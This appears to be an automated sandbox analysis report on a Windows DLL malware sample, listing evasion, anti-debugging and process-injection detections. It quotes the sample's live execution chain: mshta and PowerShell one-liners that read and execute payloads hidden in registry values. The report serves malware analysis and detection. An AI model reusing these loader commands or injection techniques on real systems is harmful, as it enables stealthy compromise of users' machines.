Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4674
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2390
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3438
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5598
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1514
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1463

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5044	Thread sleep time: -1667865539s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5764	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5764	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5548	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5604	Thread sleep count: 1514 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5604	Thread sleep count: 1463 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5144	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5144	Thread sleep time: -922337203685477s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462FEC2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	3_2_0462FEC2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04639F9E FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	3_2_04639F9E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462F8CE wsprintfA,lstrlenW,WriteFile,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	3_2_0462F8CE

Source: C:\Windows\SysWOW64\regsvr32.exe

3_2_0462FD33

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: mshta.exe, 00000023.00000003.856754934.0000025397C3B000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}J
Source: mshta.exe, 00000031.00000003.892638496.0000023B71221000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: mshta.exe, 0000002D.00000003.880596197.000002732AA5F000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}_

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10001BAC LoadLibraryA,GetProcAddress,

0_2_10001BAC

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_04637EA1 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

3_2_04637EA1

HIPS / PFW / Operating System Protection Evasion:

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\mqjlkxcv\mqjlkxcv.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\control.exe

Thread created: unknown EIP: BD4F1580

Maps a DLL or memory area into another process

Source: C:\Windows\System32\loaddll32.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: unknown protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\loaddll32.exe	Thread register set: target process: 5512			Jump to behavior
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3424

Writes to foreign memory regions

Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF694A512E0			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF694A512E0			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD796.tmp' 'c:\Users\user\AppData\Local\Temp\rzslcw3n\CSCA64EAED44D2B4776864E5EDA5D4E8B86.TMP'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.cmdline'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES30B.tmp' 'c:\Users\user\AppData\Local\Temp\rpyoew2f\CSCDF3AABDF3FB34DF1A43A4F7FD45C9671.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1395.tmp' 'c:\Users\user\AppData\Local\Temp\xwrbq4ie\CSCC07B09CA405E4901BCF4DD90291B57CA.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1D78.tmp' 'c:\Users\user\AppData\Local\Temp\pkkmtuzt\CSC7DF2BB886B1A41BB8B841DD3834E0B8.TMP'

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Vo0g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vo0g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>N4ot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(N4ot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Nohx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nohx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'

Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_04622239 cpuid

3_2_04622239

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
